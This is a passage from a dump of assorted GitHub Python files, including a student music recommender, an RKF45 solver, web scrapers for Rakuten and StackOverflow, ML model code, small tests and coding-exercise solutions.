[]\r\n for user in bestUser:\r\n recs = drop(prefs,userMap[user])\r\n if recommendations == []:\r\n recommendations = recs\r\n else:\r\n recommendations.extend(recs)\r\n finalRec = recommendations\r\n finalRec.sort()\r\n print(*finalRec, sep = \"\\n\")\r\n\r\n\r\ndef findBestUser(userName, prefs, userMap):\r\n '''Find the user whose tastes are closest to the current user.\r\n Return the best user's name ( a string) '''\r\n bestUser = []\r\n bestScore = -1\r\n maxScore = len(prefs)\r\n for user in userMap.keys():\r\n if '$' in user:\r\n continue\r\n newprefs = userMap[user]\r\n score = numMatches(prefs, newprefs)\r\n if score == 0:\r\n continue\r\n if maxScore == score:\r\n continue \r\n if score > bestScore and userName != user:\r\n bestScore = score\r\n bestUser = [user]\r\n if score == bestScore and userName != user and user not in bestUser:\r\n bestUser.insert(-1,user)\r\n return bestUser\r\n\r\n\r\n\r\ndef drop(list1, list2):\r\n '''Return a new list that contains only the elements in\r\n list2 that were NOT in list1.'''\r\n\r\n list3 = []\r\n i = 0\r\n j = 0\r\n while i < len(list1) and j < len(list2):\r\n if list1[i] == list2[j]:\r\n i += 1\r\n j += 1\r\n elif list1[i] < list2[j]:\r\n i += 1\r\n else:\r\n list3.append(list2[j])\r\n j += 1\r\n # add the rest of list2 if theres anything left\r\n while j < len(list2):\r\n list3.append(list2[j])\r\n j += 1\r\n\r\n return list3\r\n\r\ndef numMatches(list1, list2):\r\n '''return the number of elements that match between\r\n two sorted lists'''\r\n matches = 0\r\n i = 0\r\n j = 0\r\n while i < len(list1) and j < len(list2):\r\n if list1[i] == list2[j]:\r\n matches += 1\r\n i += 1\r\n j += 1\r\n elif list1[i] < list2[j]:\r\n i += 1\r\n else:\r\n j += 1\r\n return matches\r\n\r\ndef mostPopular():\r\n '''print the artist that is liked by the most users.\r\n if there is a tie, print all artists with the most likes'''\r\n userList = []\r\n memo = loadUsers(PREF_FILE)\r\n\r\n newUserList = []\r\n artistList = []\r\n\r\n likeList = []\r\n mostLikes = 0\r\n mostPopular = []\r\n\r\n finalList = []\r\n \r\n #load into userList the list of users\r\n for users in memo.keys():\r\n userList.append(users)\r\n \r\n #first exclude users with a $\r\n for i in userList:\r\n if i[len(i)-1] != '$' and len(i) != 0:\r\n newUserList += [i]\r\n\r\n #second make a list of artists w/o users\r\n # i am comparing newUserList to the base list, since that has the artists\r\n #then adding the artists not attached to a private user to artistList\r\n for users in newUserList:\r\n if users in memo:\r\n artistList += memo[users]\r\n\r\n #next try to get the number of likes intoa list w/ the artist\r\n #the list will have [artist, likes]\r\n for artists in artistList:\r\n if likeList != []:\r\n for item in likeList:\r\n if artists != item[0]: #item[0] is the artist\r\n likeList += [[artists,1]]\r\n else:\r\n item[1] +=1 #item[1] is the like number\r\n break\r\n else:\r\n likeList += [[artists,1]]\r\n \r\n #sort through likeList to find the artist with the most likes\r\n for term in likeList:\r\n if term[1] == mostLikes:\r\n mostPopular += [item[0]]\r\n mostPopular.sort()\r\n if term[1] > mostLikes:\r\n mostPopular = [term[0]]\r\n mostPopular.sort()\r\n mostLikes = term[1]\r\n \r\n #return the most popular artists\r\n #also account for if there are not top artists\r\n if len(mostPopular) == 0:\r\n print('Sorry no artists found')\r\n else:\r\n for item in mostPopular:\r\n if len(mostPopular) != 0:\r\n print(item)\r\n \r\n \r\ndef howPopular():\r\n '''returns the number of likes the most popluar artists received'''\r\n \r\n #I just copied mostPop to get a list w/ [arist,likes]\r\n userList = []\r\n memo = loadUsers(PREF_FILE)\r\n\r\n newUserList = []\r\n artistList = []\r\n\r\n likeList = []\r\n mostLikes = 0\r\n mostPopular = []\r\n \r\n \r\n #load into userList the list of users\r\n for users in memo.keys():\r\n userList.append(users)\r\n \r\n #first exclude users with a $\r\n for i in userList:\r\n if i[len(i)-1] != '$' and len(i) != 0:\r\n newUserList += [i]\r\n\r\n #second make a list of artists w/o users\r\n # i am comparing newUserList to the base list, since that has the artists\r\n #then adding the artists not attached to a private user to artistList\r\n for users in newUserList:\r\n if users in memo:\r\n artistList += memo[users]\r\n\r\n #next try to get the number of likes intoa list w/ the artist\r\n #the list will have [artist, likes]\r\n for artists in artistList:\r\n if likeList == []:\r\n likeList += [[artists,1]]\r\n else:\r\n for item in likeList:\r\n if artists != item[0]: #item[0] is the artist\r\n likeList += [[artists,1]]\r\n else:\r\n item[1] +=1 #item[1] is the like number\r\n break\r\n \r\n #artists with the most likes\r\n for item in likeList:\r\n if item[1] > mostLikes:\r\n mostLikes = item[1]\r\n\r\n if mostLikes == 0:\r\n print('Sorry no artists found')\r\n else:\r\n print(mostLikes)\r\n\r\n\r\ndef RunPreferences(userName, UserMap): #name 'userMap' is not defined\r\n if userName in UserMap:\r\n prefs = UserMap[userName]\r\n return prefs\r\n else:\r\n prefs = []\r\n print('I see that you are a new user')\r\n newPref = input('Please enter the name of an artist you like: ')\r\n while newPref != '':\r\n prefs.append(newPref.strip().title())\r\n newPref = input('Please enter another artist or band that you like or just press Enter to see Menu:')\r\n prefs.sort()\r\n UserMap[userName] = prefs\r\n return prefs\r\n\r\n\r\ndef MostLikes(userMap):\r\n '''Finds and returns the user/users with the highest number of preferred\r\n artists.'''\r\n XuserMap = filter(lambda x:'$' not in x, userMap.keys()) #filters non $ users\r\n if len(XuserMap) == 0:\r\n print('Sorry no user found.')\r\n TopUser = [XuserMap[0]] #takes first user as base case\r\n for user in XuserMap:\r\n if len(userMap[user]) > len(userMap[TopUser[0]]): #replaces TopUser if more\r\n TopUser = [user]\r\n if len(userMap[user]) == len(userMap[TopUser[0]]) and user != TopUser[0]: #joins TopUser if equal?\r\n TopUser.append(user)\r\n TopUser.sort()\r\n print(\"\\n\".join(TopUser)) #prints the TopUser/users on individual lines\r\n\r\n\r\n\r\ndef Quit(userName, userMap, fileName):\r\n '''Saves changes made to the file's content and safely exits the program.'''\r\n try:\r\n file = open(fileName, 'w')\r\n for user in userMap:\r\n toSave = str(user) + ':' + ','.join(userMap[user]) + '\\n'\r\n file.write(toSave)\r\n file.close()\r\n except FileNotFoundError:\r\n file = open(fileName, 'w+')\r\n for user in userMap:\r\n toSave = str(user) + ':' + ','.join(userMap[user]) + '\\n'\r\n file.write(toSave)\r\n file.close()\r\n \r\n \r\ndef main():\r\n ''' The main recommendation function '''\r\n\r\n #STARTING CODE SHOULD RUN BEFORE MAIN\r\n userMap = loadUsers(PREF_FILE)\r\n print('Welcome to the music recommender')\r\n userName = input('Please enter your name ( put a $ symbol after your name if you wish your preferences to remain private ): ')\r\n prefs = RunPreferences(userName, userMap)\r\n \r\n menuLoop = True\r\n while menuLoop == True:\r\n option = input('\\n Enter a letter to choose an option :' '\\n'\r\n 'e - Enter preferences' '\\n'\r\n 'r - Get recommendations' '\\n'\r\n 'p - Show most popular artists' '\\n'\r\n 'h - How popular is the most popular' '\\n'\r\n 'm - Which user has the most likes' '\\n'\r\n 'q - Save and quit' '\\n ')\r\n if option == 'e':\r\n prefs = EnterPreferences(userName, userMap)\r\n if option == 'r':\r\n Recs = getRecommendations(userName, prefs, userMap)\r\n if option == 'p':\r\n MVPs = mostPopular()\r\n if option == 'h':\r\n MVPsCount = howPopular()\r\n if option == 'm':\r\n SpotifyCamper = MostLikes(userMap)\r\n if option == 'q':\r\n Terminator = Quit(userName, userMap, PREF_FILE)\r\n break\r\n\r\nif __name__ == \"__main__\": main()\r\n\r\n\r\n\r\n","repo_name":"redstarkeT/CS-115-Assignments","sub_path":"CS 115 Assignments/musicrecplus.py","file_name":"musicrecplus.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72473388990","text":"import numpy as np\nfrom electron import RME, M_fac \nfrom gen_var import I \nimport frigg_it_logic as fil\n\ndef rkf(x,y,h,func,BT,BTS,xr,xl):\n # min and max time step\n hmin = 1e-5\n hmax = 5e-1\n h_arr = []\n br_no = 10\n \"\"\"# min and max errors\n if y > 10000.0/(RME*M_fac): #1e-8 and 1e-4 works\n err_min = 1e-8\n err_max = 1e-5\n elif y > 1000.0/(RME*M_fac): # 1e-10 and 1e-6 works\n err_min = 1e-10\n err_max = 1e-7\n else: # 1e-13 and 1e-8 works\n err_min = 1e-12\n err_max = 1e-8\"\"\"\n\n err_min = 1e-8\n err_max = 1e-5\n # max number of iterations\n N = int((xr - xl)/hmin)\n N = 100\n #if x+h > xr:\n # h = xr-x\n if x - np.abs(h) < xl:\n h = x - xl \n #calculate the k's \n for i in range(N):\n h = np.abs(h)\n k1 = func(x,y)\n k2 = func(x + BT[1,0]*h, y - h*(k1*BT[1,1])) # should be + not - but need to account for negative dr \n k3 = func(x + BT[2,0]*h, y - h*(k1*BT[2,1] + k2*BT[2,2]))\n k4 = func(x + BT[3,0]*h, y - h*(k1*BT[3,1] + k2*BT[3,2] + k3*BT[3,3]))\n k5 = func(x + BT[4,0]*h, y - h*(k1*BT[4,1] + k2*BT[4,2] + k3*BT[4,3] + k4*BT[4,4]))\n k6 = func(x + BT[5,0]*h, y - h*(k1*BT[5,1] + k2*BT[5,2] + k3*BT[5,3] + k4*BT[5,4] + k5*BT[5,5]))\n\n #calculate fourth and fifth order solutions \n y4 = y - h*(BTS[0,0]*k1 + BTS[0,2]*k3 + BTS[0,3]*k4 + BTS[0,4]*k5)\n y5 = y - h*(BTS[1,0]*k1 + BTS[1,2]*k3 + BTS[1,3]*k4 + BTS[1,4]*k5 + BTS[1,5]*k6)\n\n y_norm = np.max(np.asarray(y4,y5))\n err = np.abs(y4/y_norm-y5/y_norm) # need to remove y norms if this doesn't work\n\n if err < err_min and y4 > 0.0 and y5 > 0.0:\n # if error small, enlarge h, but match final simulation time\n h = min(2.*np.abs(h),hmax) \n if x - h < xl:\n h = xl - x\n break\n elif err > err_max or y4 < 0.0 or y5 < 0.0:\n # if error big or energy is less than critical value, reduce h\n h = max(np.abs(h/2.),hmin)\n else:\n # error is ok, take this h and y5\n break\n h_arr.append(h)\n if i%br_no ==0 and i>0:\n test, h_test = fil.frigg_it_logic(h_arr, br_no)\n if test == 'true':\n h = h_test\n y4 = y - h*(BTS[0,0]*k1 + BTS[0,2]*k3 + BTS[0,3]*k4 + BTS[0,4]*k5)\n y5 = y - h*(BTS[1,0]*k1 + BTS[1,2]*k3 + BTS[1,3]*k4 + BTS[1,4]*k5 + BTS[1,5]*k6)\n err = np.abs(y4-y5)\n print(\"'Frigg it' logic used\")\n break\n else:\n pass\n if i==N-1:\n print(\"max number of iterations reached, check parameters\")\n k = [k1,k2,k3,k4,k5,k6]\n return x - np.abs(h), y5, h , err, k\n","repo_name":"fkmart/Pellet-Ablation","sub_path":"rkf45_euler.py","file_name":"rkf45_euler.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36234487244","text":"class detectorConfig:\n min_size = 800\n max_size = 1000\n image_mean = [0.485, 0.456, 0.406]\n image_std = [0.229, 0.224, 0.225]\n\n # anchor parameters\n anchor_size = [64, 128, 256]\n anchor_ratio = [0.5, 1, 2.0]\n\n # roi align parameters\n roi_out_size = [7, 7]\n roi_sample_rate = 2\n\n # rpn process parameters\n rpn_pre_nms_top_n_train = 2000\n rpn_post_nms_top_n_train = 2000\n\n rpn_pre_nms_top_n_test = 1000\n rpn_post_nms_top_n_test = 1000\n\n rpn_nms_thresh = 0.7\n rpn_fg_iou_thresh = 0.7\n rpn_bg_iou_thresh = 0.3\n rpn_batch_size_per_image = 256\n rpn_positive_fraction = 0.5\n\n # remove low threshold target\n box_score_thresh = 0.015\n box_nms_thresh = 0.5\n box_detections_per_img = 100\n box_fg_iou_thresh = 0.5\n box_bg_iou_thresh = 0.5\n box_batch_size_per_image = 512\n box_positive_fraction = 0.25\n bbox_reg_weights = None\n","repo_name":"PushparajaMurugan/RCNN_Infinite_Batches","sub_path":"Detector_RCNN_configuration.py","file_name":"Detector_RCNN_configuration.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32580213545","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef appendAndDeleteMine(s, t, k):\n # print(s, t, k)\n N = 'No'\n Y = 'Yes'\n r = N\n isSHasStr = True\n tIndex = 0\n lT = len(t) + len(s)\n if lT <= k:\n r = Y\n elif s == t:\n r = Y\n else:\n i=0\n while i=len(t)-i and len(s) -i k:\n return \"No\"\n elif (len(s) + len(t) - 2*i)%2 == k%2:\n return \"Yes\"\n elif len(s) + len(t) -k <0 :\n return \"Yes\"\n else:\n return \"No\"\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n # fptr = open(\".m.txt\", 'w')\n\n s = input()\n\n t = input()\n\n k = int(input().strip())\n\n result = appendAndDelete(s, t, k)\n # print(result)\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"asraful009/problem-solve","sub_path":"hackerrank_problem/appendAndDelete/appendAndDelete.py","file_name":"appendAndDelete.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15270413246","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\n\n\nurl = 'https://travel.rakuten.co.jp/HOTEL/27813/27813_std.html'\nreq = requests.get(url)\nsoup = BeautifulSoup(req.content,'html.parser')\n\nhotel_title = soup.find('a',{'class': 'rtconds fn'})\nhotel_title = hotel_title.text\n\nimgs = soup.find_all('ul',{'class':'std-photo-video-thumbnail'})\nimgs = imgs[0].find_all('img')\nimgs_l = []\n# c = 1\nfor i in imgs:\n img_url = i.get('src')\n imgs_l.append(img_url)\nc = 1\n# def generate_img_slider(imgs_l,c):\ndivs_l = []\nfor i in range(len(imgs_l)):\n img_div = ('''
    \"Banner\"\n

    [[HOLE 1 PAR4 Regular309Y HDCP17]]

    \n
    ''' %(str(c),imgs_l[i]))\n divs_l.append(img_div)\n c+=1\n # print(img_div)\n\n # return divs_l\n\ninfo_titles = soup.find_all('h2',{'class':'dtlTblTtl'})\ninfo_titles_l = []\nfor i in info_titles:\n info_titles_l.append(i.text)\n\ninfo_titles_l = info_titles_l[1:]\n# print(info_titles_l)\n\nbasic_info = soup.find_all('ul',{'class':'dtlTbl'})\nd_basic_info_l = []\nfor i in basic_info:\n d_basic_info_l.append(i.text)\n\n# Basic information section formatting\n\ni1 = d_basic_info_l[0]\ni1 = i1.split('\\n\\n\\n\\n')\ni1_l =[]\n\nfor j in i1:\n j = j.split('\\n')\n i1_l.append(j)\n\nfor i in range(len(i1_l)):\n temp =[]\n for j in i1_l[i]:\n if j != '':\n temp.append(j) \n i1_l[i] = temp\n \nfor i in range(len(i1_l)):\n i1_l[i] = (' '.join(i1_l[i]))\n\n\nfor i in range(len(i1_l)):\n i1_l[i] = i1_l[i].split(' ')\n\nd_basic_info={}\nfor i in i1_l:\n if len(i)>1:\n d_basic_info[i[0]] = i[1:]\nfor i in d_basic_info:\n info_div = ('''
    \n

    %s

    \n
    \n
    %s
    \n
    ''' %(i , ' '.join(d_basic_info[i])))\n # print(info_div)\n# 976 vr i2 ch takaych ahe\n\n\n# 2nd info table scrapping\n\ni2 = d_basic_info_l[1]\ni2_l = i2.split('\\n\\n\\n\\n\\n')\nfor i in range(len(i2_l)):\n i2_l[i] = i2_l[i].split('\\n')\n temp =[]\n for j in i2_l[i]:\n if j != '':\n temp.append(j)\n i2_l[i] = temp\n\nfor i in i2_l:\n if len(i) == 0:\n i2_l.remove(i)\nd_i2 = {}\nfor i in i2_l:\n d_i2[i[0]] = i[1:]\nfor i in d_i2:\n d_i2[i] = ' '.join(d_i2[i])\n\n\nfor i in d_i2:\n info_div_1 = ('''
    \n

    %s

    \n
    \n
    %s
    \n
    ''' %(i , ' '.join(d_i2[i])))\n print(info_div_1)\n\nprint()\n\n\n\n# slider = ('''\n#
    \n#
    \n#
    \n#
    \n#
    %s
    \n# \n#
    \n#
    \n# \n#
      \n#
    • \n# \n#
    • \n#
    \n# \n# \n#
    \n#
    \n# \n# \n# \n# \n#
    \n# \n#
    \n#
    \n#
      \n# \n#
    • \n# \n#
    • \n# \n#
    \n \n#
    \n# \n#
    \n#
    \n# \n#
    \"Banner\"\n#

    [[HOLE 1 PAR4 Regular309Y HDCP17]]

    \n#
    \n# \n#
    \n#
    \n# \n#
    \n#
    \n#
    \n# \n \n#
    \n# \n#
    \n#
    \n# \n#
    \n#
    \n#
    \n#
    ''' %(hotel_title,url ))\n\n\n","repo_name":"yashschaudhari01/Rakuten-Scrapper","sub_path":"hotel_detail/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16434317066","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 24 14:16:54 2021\n\n@author: Fuzz4\n\"\"\"\nimport torch\nimport numpy as np\nfrom ..core.module import Module\n\ndef split_data(n_p, n_f, dim_u, datasets):\n dynamic = n_p + n_f\n train_X, train_L, test_X, test_L = datasets\n dim_dy = train_X.shape[1]\n dim_z = int( dim_dy / dynamic )\n train_U, train_Y, test_U, test_Y = [], [], [], []\n for t in range(dynamic):\n u_start, u_end = int(t*dim_z), int(t*dim_z+dim_u)\n y_start, y_end = int(t*dim_z+dim_u), int((t+1)*dim_z)\n train_U.append(train_X[:,u_start: u_end])\n train_Y.append(train_X[:,y_start: y_end])\n test_U.append(test_X[:,u_start: u_end])\n test_Y.append(test_X[:,y_start: y_end])\n train_U, train_Y, test_U, test_Y = np.concatenate(train_U, 1), np.concatenate(train_Y, 1),\\\n np.concatenate(test_U, 1), np.concatenate(test_Y, 1)\n print(train_U.shape, train_Y.shape, test_U.shape, test_Y.shape)\n print(train_L.shape, test_L.shape)\n train_X, test_X = np.concatenate([train_U, train_Y], 1), np.concatenate([test_U, test_Y], 1)\n # split_point = dim_u * dynamic + dim_y * n_p\n # input = X[:, :split_point], label = X[:, split_point:]\n return train_X, train_L, test_X, test_L\n\nclass SupDynamic(Module):\n def __init__(self, **kwargs):\n default = {'dim_u': None, # 未堆叠前u的维度\n 'dim_y': None, # 未堆叠前y的维度\n 'n_p': None, # 用于预测x(k)的堆叠时刻数\n 'n_f': None, # 用于预测后n_f个y_f(k)\n 'struct': []\n }\n \n for key in default.keys():\n if key not in kwargs:\n kwargs[key] = default[key]\n \n kwargs['split_p'] = int(kwargs['dim_u']*(kwargs['n_p'] + kwargs['n_f']) +\\\n kwargs['dim_y'] * kwargs['n_p'])\n kwargs['struct'][0] = kwargs['split_p']\n \n self._name = 'SupDynamic'\n Module.__init__(self, **kwargs)\n self.FCNN = self.Sequential()\n self.opt()\n \n def forward(self, dy_x):\n inputs, labels = dy_x[:,:self.split_p], dy_x[:,self.split_p:]\n pred_ys = self.FCNN(inputs)\n self.loss = self.L(pred_ys, labels)\n return labels - pred_ys","repo_name":"zhuofupan/Pytorch-Deep-Neural-Networks","sub_path":"fuzz/model/supdy.py","file_name":"supdy.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"60"} +{"seq_id":"12762136196","text":"# 装饰器的的作用:在不改变原函数的调用方式的情况下,在函数的前后添加功能;\r\n# 装饰器的本质:闭包函数\r\n\r\n###例子1:\r\n# def wrapper(func):\r\n# def inner(*args, **kwargs): ##inner((7,)),接收的是一个元组\r\n# print('在被装饰的函数执行之前做的事')\r\n# ret = func(*args, **kwargs) ##holiday(*(3,),**{}),调用会打散元组\r\n# print('在被装饰的函数执行之后做的事')\r\n# return ret\r\n#\r\n# return inner\r\n#\r\n#\r\n# @wrapper # 等价于 holiday = wrapper(holiday)\r\n# def holiday(day):\r\n# print(\"全体放假%s天\" % day)\r\n# return \"好开心\"\r\n#\r\n# print(holiday.__name__) ##结果为inner,所以这种情况下,函数的属性改变了\r\n# a = holiday(7) ##相当于inner(7)\r\n# print(a)\r\n\r\n##例子2:【使用wraps方法保���函数的属性值】\r\nfrom functools import wraps ##导入wraps方法\r\ndef wrapper(func):\r\n @wraps(func)\r\n def inner(*args, **kwargs): ##inner((7,)),接收的是一个元组\r\n print('在被装饰的函数执行之前做的事')\r\n ret = func(*args, **kwargs) ##holiday(*(3,),**{}),调用会打散元组\r\n print('在被装饰的函数执行之后做的事')\r\n return ret\r\n\r\n return inner\r\n\r\n\r\n@wrapper\r\ndef holiday(day):\r\n print(\"全体放假%s天\" % day)\r\n return \"好开心\"\r\n\r\nprint(holiday.__name__) ##结果依然为holiday,这样真正做到了只扩展函数功能,不改变函数原有的属性\r\na = holiday(7) ##相当于inner(7)\r\nprint(a)\r\n\r\n\r\n'''\r\n详解:\r\n(1)未使用装饰器函数,函数执行过程:\r\n 传参数\r\n 我 <---------> 函数\r\n 返回值\r\n\r\n(2)使用装饰器函数,函数执行过程:\r\n 传参数\r\n 我 <---------> 装饰器 <---------> 函数\r\n 返回值\r\n'''\r\n\r\n\r\n##打印方法函数的__name__属性\r\n# def wahaha():\r\n# '''\r\n# function of wahaha;\r\n# :return:\r\n# '''\r\n# print('娃哈哈')\r\n#\r\n# print(wahaha.__name__) ##打印函数的__name__属性\r\n# print(wahaha.__doc__) ##打印函数注释文档信息","repo_name":"xincuter/myops","sub_path":"python/老男孩python教程第9期/day12/06_装饰器精讲.py","file_name":"06_装饰器精讲.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"10334908844","text":"import sklearn.datasets\nimport sklearn.ensemble\nimport sklearn.linear_model\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import train_test_split\n\nfrom baikal import Input, Model, make_step\nfrom baikal.plot import plot_model\nfrom baikal.steps import Concatenate\n\n\n# ------- Define steps\nLogisticRegression = make_step(sklearn.linear_model.LogisticRegression)\nRandomForestClassifier = make_step(sklearn.ensemble.RandomForestClassifier)\nExtraTreesClassifier = make_step(sklearn.ensemble.ExtraTreesClassifier)\n\n# ------- Load dataset\ndata = sklearn.datasets.load_breast_cancer()\nX, y_p = data.data, data.target\nX_train, X_test, y_train, y_test = train_test_split(\n X, y_p, test_size=0.2, random_state=0\n)\n\n# ------- Build model\nx = Input()\ny_t = Input()\ny_p1 = LogisticRegression(function=\"predict_proba\")(x, y_t)\ny_p2 = RandomForestClassifier(function=\"predict_proba\")(x, y_t)\nensemble_features = Concatenate()([y_p1, y_p2])\ny_p = ExtraTreesClassifier()(ensemble_features, y_t)\n\nmodel = Model(x, y_p, y_t)\nplot_model(model, filename=\"stacked_classifiers.png\", dpi=96)\n\n# ------- Train model\nmodel.fit(X_train, y_train)\n\n# ------- Evaluate model\ny_train_pred = model.predict(X_train)\ny_test_pred = model.predict(X_test)\n\nprint(\"F1 score on train data:\", f1_score(y_train, y_train_pred))\nprint(\"F1 score on test data:\", f1_score(y_test, y_test_pred))\n","repo_name":"seeker1943/baikal","sub_path":"examples/stacked_classifiers.py","file_name":"stacked_classifiers.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"41278923104","text":"def get_ida_taint_overlay(entrypoint, trace, taint_graph, file):\n import json\n\n # Find all addresses that are not sources of another address.\n # These should be highlighted as the beginning of the taint\n # Or end of reverse taint. However you want to look at it.\n addr_seen = {}\n for idx, sources in taint_graph._path.items():\n addr = trace._trace[idx]\n addr_seen[addr] = False\n for src in sources:\n addr_seen[src[0]] = True\n\n out_map = {\n \"entrypoint\": entrypoint,\n \"comments\": [],\n }\n for addr, src in path.items():\n comment = \", \".join([f\"0x{x[0]:x}|{x[1]}\" for x in src])\n comment_struct = {\n \"address\": addr,\n \"thread_id\": \"main\",\n \"text\": f\" <- {comment}\",\n }\n if src[0][1] == \"user_taint\":\n comment_struct[\"color\"] = 0xE16563\n if not addr_seen[addr]:\n comment_struct[\"color\"] = 0x81CD4E\n\n # green\n\n out_map[\"comments\"].append(comment_struct)\n\n r = json.dumps(out_map)\n loaded_r = json.loads(r)\n file.write(\"DISAS\\n\" + json.dumps(loaded_r, indent=4, sort_keys=True))","repo_name":"zeropointdynamics/zelos-crashd","sub_path":"src/crashd/taint/render/ida.py","file_name":"ida.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"11442432791","text":"from src.presentation.controllers.contatos.delete_contato_controller import DeleteContatoController\nfrom src.infra.tests.contato_repository import ContatosRepositorySpy\nfrom src.presentation.http_types.http_response import HttpResponse\n\n\nclass HttpResquetMock:\n def __init__(self):\n self.body = {\"id_\": 22}\n\n\n\ndef test_handle():\n htt_request_mock = HttpResquetMock()\n use_case = ContatosRepositorySpy()\n controller = DeleteContatoController(use_case)\n\n response = controller.handle(htt_request_mock)\n\n assert isinstance(response, HttpResponse)\n","repo_name":"felypecoliveira/CleanArch","sub_path":"src/presentation/controllers/contatos/delete_contato_controller_test.py","file_name":"delete_contato_controller_test.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42262144771","text":"from models.spatial_bicycle_model import SpatialBicycleModel\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pytest\n\nimport math\n\n\n@pytest.mark.parametrize('vehicle, result', [\n ({'x': 0, 'y': 0, 'theta': math.pi/2}, {'e_y': 0, 'e_psi': 0}),\n ({'x': 1, 'y': 0, 'theta': math.pi/2}, {'e_y': -1, 'e_psi': 0}),\n ({'x': -1, 'y': 0, 'theta': math.pi/2}, {'e_y': 1, 'e_psi': 0}),\n ({'x': 100, 'y': 0, 'theta': 0}, {'e_y': -100, 'e_psi': -math.pi/2}),\n ({'x': -100, 'y': 0, 'theta': math.pi}, {'e_y': 100, 'e_psi': math.pi/2})\n])\ndef test_vehicle_in_path(path_array, vehicle, result, plot):\n vehicle_pose = np.array([vehicle['x'], vehicle['y'], vehicle['theta']])\n\n spatial_bicycle_model = SpatialBicycleModel()\n\n state = spatial_bicycle_model.get_state(vehicle_pose, path_array)\n\n assert state[0] == result['e_y']\n assert state[1] == result['e_psi']\n\n if plot:\n plt.plot(path_array[:, 0], path_array[:, 1])\n plt.plot(vehicle_pose[0], vehicle_pose[1], 'go')\n\n plt.axhline(0, color='black', alpha=0.1)\n plt.axvline(0, color='black', alpha=0.1)\n plt.show()\n","repo_name":"Javiercerna/navigation-python","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12316852140","text":"import keyboard\nfrom time import sleep\nfrom vision import Locator\nimport numpy as np\n# import matplotlib.pyplot as plt\n\n\nlocator = Locator()\n\ndef wait_keyboard():\n print(\"Press t to test LiDAR...\")\n keyboard.wait(\"t\")\n print(\"\\bGrabbing location...\")\n \n try:\n locator.locate()\n locator.print_location()\n except RuntimeError as e:\n print(e)\n \n sleep(0.1)\n wait_keyboard()\n\ndef run_tests(num):\n NUM_TESTS = 1\n results_x = []\n results_y = []\n results_a = []\n for i in range(NUM_TESTS):\n print(f\"{i+1}/{NUM_TESTS}\")\n try:\n locator.locate()\n # locator.print_location()\n results_x.append(locator.x)\n results_y.append(locator.y)\n results_a.append(locator.angle)\n except RuntimeError as e:\n print(e)\n \n # t = [(i+1) for i in range(num)]\n print(f\"x_std: {np.std(results_x)} ({results_x[-1]})\")\n print(f\"y_std: {np.std(results_y)} ({results_y[-1]})\")\n print(f\"a_std: {np.std(results_a)}\")\n # plt.plot(t, results_x, 'r--', t, results_y, 'bs')\n #plt.ylabel(\"Distance (mm)\")\n # plt.show()\n","repo_name":"SpaceHawks/robot2021","sub_path":"robot/vision_test.py","file_name":"vision_test.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"33892892913","text":"import requests\nfrom bs4 import BeautifulSoup\nimport lxml\nimport pandas\n\nUNI = requests.get(\"https://stackoverflow.com/questions/tagged/beautifulsoup\")\n\nquest = BeautifulSoup(UNI.text, 'lxml')\nres = quest.find_all('h3', class_='s-post-summary--content-title')\nvotes = quest.find_all('div', class_='s-post-summary--stats-item s-post-summary--stats-item__emphasized')\nanswers = quest.find_all('div', class_='s-post-summary--stats-item has-answers')\nchildrenQ = []\nchildrenV = []\nchildrenA = []\n\nfor i in range(10):\n question = res[i].findChildren(\"a\", recursive=False)\n vote = votes[i].findChildren('span', class_='s-post-summary--stats-item-number')\n answer = answers[i].findChildren('span', class_='s-post-summary--stats-item-number')\n childrenQ.append(question[0].getText())\n childrenV.append(vote[0].getText())\n childrenA.append(answer[0].getText())\n\ndata = {\n \"titre\": childrenQ,\n \"votes\": childrenV,\n \"answers\": childrenA\n}\ndf = pandas.DataFrame(data, columns=[\"titre\", \"votes\", \"answers\"])\n\ndf.to_csv(\"data.csv\", index=0)","repo_name":"Mildor/td4","sub_path":"td4exo3.py","file_name":"td4exo3.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29035038051","text":"# [BOJ] 2869. 달팽이는 올라가고 싶다\n\n# A: 낮에 올라가는 거리 / # B: 밤에 미끄러지는 ��리 / V: 나무 막대 높이\nA, B, V = map(int, input().split())\n\n#---------------------\n# 시간초과 발생 코드-> day를 구할 때까지 while문을 반복하기 때문에 발생\n# day를 바로 도출해야 함\n# day = 0\n# go = 